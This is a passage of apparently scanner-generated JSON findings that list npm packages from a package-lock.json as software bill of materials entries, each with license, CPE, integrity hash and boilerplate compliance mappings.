"sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "42e775567d560303", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: string_decoder 1.3.0", "title": "string_decoder 1.3.0", "description": "Package discovered: string_decoder 1.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "31e1990d6adabf2b", "name": "string_decoder", "version": "1.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/string_decoder@1.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", "dependencies": { "safe-buffer": "~5.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "611033baae4657b2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: strip-ansi 6.0.1", "title": "strip-ansi 6.0.1", "description": "Package discovered: strip-ansi 6.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e47d9046945afbeb", "name": "strip-ansi", "version": "6.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/strip-ansi@6.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "dependencies": { "ansi-regex": "^5.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ca95150df82b38c3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: strip-ansi 7.2.0", "title": "strip-ansi 7.2.0", "description": "Package discovered: strip-ansi 7.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "efdaea275ca01865", "name": "strip-ansi", "version": "7.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/strip-ansi@7.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz", "integrity": "sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==", "dependencies": { "ansi-regex": "^6.2.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "680b8434591c36cc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: strnum 2.2.3", "title": "strnum 2.2.3", "description": "Package discovered: strnum 2.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9368f059f77a6fca", "name": "strnum", "version": "2.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/strnum@2.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "71b1b284c1af24b8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: stubs 3.0.0", "title": "stubs 3.0.0", "description": "Package discovered: stubs 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "10401a0421b092a3", "name": "stubs", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/stubs@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz", "integrity": "sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a4561300304da31c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: styled-jsx 5.1.1", "title": "styled-jsx 5.1.1", "description": "Package discovered: styled-jsx 5.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b71f2c964dcb79d3", "name": "styled-jsx", "version": "5.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/styled-jsx@5.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz", "integrity": "sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw==", "dependencies": { "client-only": "0.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d085117a189c2037", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: sucrase 3.35.1", "title": "sucrase 3.35.1", "description": "Package discovered: sucrase 3.35.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "302884898f3a35c4", "name": "sucrase", "version": "3.35.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/sucrase@3.35.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz", "integrity": "sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==", "dependencies": { "@jridgewell/gen-mapping": "^0.3.2", "commander": "^4.0.0", "lines-and-columns": "^1.1.6", "mz": "^2.7.0", "pirates": "^4.0.1", "tinyglobby": "^0.2.11", "ts-interface-checker": "^0.1.9" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "57ae1f3ed312e075", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: supports-preserve-symlinks-flag 1.0.0", "title": "supports-preserve-symlinks-flag 1.0.0", "description": "Package discovered: supports-preserve-symlinks-flag 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cb6982ee071dbb85", "name": "supports-preserve-symlinks-flag", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7b659eb857ace717", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: svg-arc-to-cubic-bezier 3.2.0", "title": "svg-arc-to-cubic-bezier 3.2.0", "description": "Package discovered: svg-arc-to-cubic-bezier 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "03465a3bffd322b9", "name": "svg-arc-to-cubic-bezier", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", 